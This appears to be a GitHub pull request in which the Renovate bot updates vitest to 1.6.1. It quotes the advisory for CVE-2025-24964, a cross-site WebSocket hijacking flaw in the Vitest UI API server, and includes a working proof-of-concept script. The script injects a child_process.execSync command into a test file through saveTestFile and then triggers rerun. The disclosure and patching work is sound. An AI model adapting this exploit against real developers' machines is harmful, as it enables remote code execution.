Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly
Sign up
Appearance settings

chore(deps): update dependency vitest to v1.6.1 [security] #49

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
renovate wants to merge 1 commit into main
base: main
Choose a base branch
Loading
from renovate/npm-vitest-vulnerability

Conversation

@renovate
Copy link

@renovate renovate bot commented Apr 29, 2025
edited
Loading

This PR contains the following updates:

Package Change Age Confidence
vitest (source) 1.5.0 -> 1.6.1 age confidence

GitHub Vulnerability Alerts

CVE-2025-24964

Summary

Arbitrary remote Code Execution when accessing a malicious website while Vitest API server is listening by Cross-site WebSocket hijacking (CSWSH) attacks.

Details

When api option is enabled (Vitest UI enables it), Vitest starts a WebSocket server. This WebSocket server did not check Origin header and did not have any authorization mechanism and was vulnerable to CSWSH attacks.
https://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L32-L46

This WebSocket server has saveTestFile API that can edit a test file and rerun API that can rerun the tests. An attacker can execute arbitrary code by injecting a code in a test file by the saveTestFile API and then running that file by calling the rerun API.
https://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L66-L76

PoC

  1. Open Vitest UI.
  2. Access a malicious web site with the script below.
  3. If you have calc executable in PATH env var (you'll likely have it if you are running on Windows), that application will be executed.
// code from https://github.com/WebReflection/flatted
const Flatted=function(n){"use strict";function t(n){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(n){return typeof n}:function(n){return n&&"function"==typeof Symbol&&n.constructor===Symbol&&n!==Symbol.prototype?"symbol":typeof n},t(n)}var r=JSON.parse,e=JSON.stringify,o=Object.keys,u=String,f="string",i={},c="object",a=function(n,t){return t},l=function(n){return n instanceof u?u(n):n},s=function(n,r){return t(r)===f?new u(r):r},y=function n(r,e,f,a){for(var l=[],s=o(f),y=s.length,p=0;p<y;p++){var v=s[p],S=f[v];if(S instanceof u){var b=r[S];t(b)!==c||e.has(b)?f[v]=a.call(f,v,b):(e.add(b),f[v]=i,l.push({k:v,a:[r,e,b,a]}))}else f[v]!==i&&(f[v]=a.call(f,v,S))}for(var m=l.length,g=0;g<m;g++){var h=l[g],O=h.k,d=h.a;f[O]=a.call(f,O,n.apply(null,d))}return f},p=function(n,t,r){var e=u(t.push(r)-1);return n.set(r,e),e},v=function(n,e){var o=r(n,s).map(l),u=o[0],f=e||a,i=t(u)===c&&u?y(o,new Set,u,f):u;return f.call({"":i},"",i)},S=function(n,r,o){for(var u=r&&t(r)===c?function(n,t){return""===n||-1<r.indexOf(n)?t:void 0}:r||a,i=new Map,l=[],s=[],y=+p(i,l,u.call({"":n},"",n)),v=!y;y<l.length;)v=!0,s[y]=e(l[y++],S,o);return"["+s.join(",")+"]";function S(n,r){if(v)return v=!v,r;var e=u.call(this,n,r);switch(t(e)){case c:if(null===e)return e;case f:return i.get(e)||p(i,l,e)}return e}};return n.fromJSON=function(n){return v(e(n))},n.parse=v,n.stringify=S,n.toJSON=function(n){return r(S(n))},n}({});
// actual code to run
const ws = new WebSocket('ws://localhost:51204/__vitest_api__')
ws.addEventListener('message', e => {
 console.log(e.data)
})
ws.addEventListener('open', () => {
 ws.send(Flatted.stringify({ t: 'q', i: crypto.randomUUID(), m: "getFiles", a: [] }))
 const testFilePath = "/path/to/test-file/basic.test.ts" // use a test file returned from the response of "getFiles"
 // edit file content to inject command execution
 ws.send(Flatted.stringify({
 t: 'q',
 i: crypto.randomUUID(),
 m: "saveTestFile",
 a: [testFilePath, "import child_process from 'child_process';child_process.execSync('calc')"]
 }))
 // rerun the tests to run the injected command execution code
 ws.send(Flatted.stringify({
 t: 'q',
 i: crypto.randomUUID(),
 m: "rerun",
 a: [testFilePath]
 }))
})

Impact

This vulnerability can result in remote code execution for users that are using Vitest serve API.

Release Notes

vitest-dev/vitest (vitest)

v1.6.1

Compare Source

This release includes security patches for:

🐞 Bug Fixes
View changes on GitHub

v1.6.0

Compare Source

🚀 Features
🐞 Bug Fixes
🏎 Performance
View changes on GitHub

v1.5.3

Compare Source

🐞 Bug Fixes
View changes on GitHub

v1.5.2

Compare Source

🐞 Bug Fixes
View changes on GitHub

v1.5.1

Compare Source

🚀 Features
  • api: startVitest() to accept stdout and stdin - by @​AriPerkkio in #​5493 (780b1)
    • This is listed as a feature, but it doesn't increase the minor version because startVitest API is experimental and doesn't follow semver.
🐞 Bug Fixes
View changes on GitHub

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from 0dd94cb to 060312e Compare May 24, 2025 15:33
@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch 2 times, most recently from 34acb1b to 63a7d8f Compare June 6, 2025 12:01
@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from 63a7d8f to c3c867e Compare June 29, 2025 11:59
@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from c3c867e to 59de750 Compare July 6, 2025 12:09
@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch 2 times, most recently from 84c2e69 to dc97c29 Compare August 15, 2025 11:57
@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from dc97c29 to 80a4af9 Compare August 23, 2025 15:57
@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from 80a4af9 to ecbdb6a Compare September 1, 2025 03:59
@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from ecbdb6a to f62a503 Compare September 26, 2025 15:51
@renovate renovate bot force-pushed the renovate/npm-vitest-vulnerability branch from f62a503 to f9cbfd8 Compare October 25, 2025 04:12
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

None yet

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

0 participants

AltStyle によって変換されたページ (->オリジナル) /